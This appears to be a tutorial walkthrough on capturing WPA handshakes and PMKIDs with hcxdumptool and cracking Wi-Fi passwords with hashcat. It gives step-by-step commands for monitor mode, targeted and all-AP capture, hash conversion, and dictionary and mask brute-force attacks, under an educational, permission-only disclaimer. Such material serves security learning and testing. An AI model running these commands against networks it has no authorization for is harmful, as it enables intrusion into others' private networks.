This will be a walkthrough used to obtain wireless handshakes and PMKID using Hcxdumptool, Hcxtools, and crack it using Hashcat


This is for educational purposes and only to be performed on networks you have permission to do so.


My notes on Wireless in general can be found here.

My notes on Hashcat can be found here.

This will require having a WiFi Adapter that supports monitor mode, also known as packet injection.

I myself have and recommend these adapters:

HCXDumptool

Find your interface. If you have one network card(capable of monitor mode/packet injection) it will be wlan0, but if you have a second wireless USB dongle, it will most likely be wlan1.

iwconfig

Put interface into monitor mode

sudo airmon-ng start wlan1

This may depends on which version you have installed. Eg. v6.2.9 has a different interface than v6.3.0+. I’ll be going with the most up to date (currently v.6.3.5)

This attack is not guaranteed!!. Not all access points(APs) are vulnerable to the PMKID attack, BUT this can still obtain us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.

Info on PMKID on Hashcat Forums

HCXDumptool v6.2.9

hcxdumptool -o (name).pcapng -i (interface) --enable_status=1 --filterlist_ap=target.txt --filtermode=2

Once we obtain our PMKID we will see it at the bottom

We MAY see PMKID:XXXXXXXXXXXXXXX OR PMKIDROGUE:XXXXXXXXXXXXXXX, Even potentially M1M2ROGUE: XXXXXXXXXXXXXXX.

  • PMKID:XXXXXXXXXXXXXXX KDV:2 means You captured a PMKID requested from a CLIENT. WPA version (Key Descriptor Version) is WPA 2. You can recover the password from this.
  • PMKIDROGUE:XXXXXXXXXXXXXXX KDV:2 means the PMKID is requested by hcxdumptool and not by a CLIENT. You can recover the password from this.
  • M1M2ROGUE : EAPOL M2 is requested from a CLIENT by hcxdumptool and not from an ACCESS POINT. You can recover the password from this.

HCXDumptool v6.3.0+ (currently v6.3.5 as of writing this)

To target AP(s) we scan for target(s) with airodump-ng

sudo airodump-ng wlan1mon

Grab the BSSID(s) of our targets and put them in a Berkeley Packet Filter (BPF) .bpf file. with tcpdump OR hcxdumptool.

TCPDump

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf

HCXDumptool

hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf

** NOTE: We can target multiple APs

TCPDump:

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf

HCXDumptool:

hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf

Now run it against our target

sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan1mon -w outfile.pcapng

To target all APs around(Not recommended without given permission)

sudo hcxdumptool -i wlan1mon -w outfile.pcapng

After a while we may see the + under the 3 or P of our target. Both of which can be used to obain the password with hashcat.

Hash Cracking

So we now have our handshake in .cap format, we can crack the hash and find out the password.

Hashcat

We have our PMKID in the .pcapng format, we can use hashcat to crack it. First we must use the hcxpcapng tool from HCXtools.

sudo hcxpcapngtool -o SSIDHash outfile.cap (or .pcapng)

Dictionary

If we want to use a dictionary attack, like using rockyou.txt for example

sudo hashcat -m 22000 SSIDHash wordlist

Depending on your hardware, the dictionary you chose, and the password, this may take some time. You can press S for a status to see the time time estimated on finishing, as well as the updated “Recovered.Total” to see the recovered keys”

We can run the same command again with –show appended to the end to see our cracked passwords.

Brute Force

If we wanted to run a brute force attack rather than a dictionary attack, it’s a similar command

hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l'

Replace the ?l with whatever we deem fit.

* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s = !"#$%&'()\*+,-./:;<=>?@\[]^\_\`{|}\~
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff

This will cover the basics of the hash cracking with hashcat but it can get SO much more advanced with hashcat.